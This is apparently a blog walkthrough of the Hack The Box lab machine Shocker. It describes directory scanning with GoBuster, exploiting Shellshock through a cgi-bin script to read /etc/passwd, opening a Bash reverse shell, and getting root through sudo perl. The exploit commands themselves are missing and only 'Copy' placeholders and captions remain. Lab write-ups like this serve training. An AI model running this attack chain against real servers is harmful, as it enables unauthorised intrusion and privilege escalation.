Introduction

Today I explore Shocker from HTB; a OSCP like box featuring a Shellshock exploitable web server. Once on the box we use perl to escalate sudo. I start each box by running AutoRecon (which I have mentioned several times in other articles). During the first few seconds I see Port 80 is open so I head over to the website and see a picture of a bug.

Copy
Viewing Port 80 shows a picture of a 'bug'.

Viewing Port 80 shows a picture of a ‘bug’.

I try .html and .php extensions to gain an idea of what is running. This is just a standard HTML page. Viewing the source I see no information or comments. Checking back to my AutoRecon results I see GoBuster has found two hits for cgi-bin. This along with the name of the box was enough to let me know I was dealing with a ShellShock exploitable server. I would recommend reading THIS for more information.

Copy

I run another GoBuster against .sh extensions and pointing to the cgi-bin directory.

Copy

As you can see from the command above I specifically target Directories – dir. I request it to be ‘Quiet’ and only show relevant information -q. I put the threads (number of requests it will do) -t 50 to 50 because time is money. Finally, I use the -w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt to point to my word-list of choice and -x .sh to specifically look for shell files.

Using -x flag to search for .sh (shell) files.

Using -x flag to search for .sh (shell) files.

I get a hit and use that file to test for ShellShock:

Copy
Testing Shellshock by pulling the /etc/passwd.

Testing Shellshock by pulling the /etc/passwd.

Seeing it works I use a Bash one-liner reverse shell to log into the box. PenTestMonkey has a great article on this (but maybe web browsers have now flagged this website unjustly) so HERE is a link to PayloadAlltheThings instead. Once I logged into the box I ran sudo -l which should always be one of the first things to check.

It showed me that perl could be ran as sudo. Head over to GTFOBINS and root.

Copy
Copy
Rooting Shocker from HTB with proof.

Rooting Shocker from HTB with proof.

Rooted

Published On: October 13th, 2020 / Categories: HTB, Technology / Tags: , , , /

Leave A Comment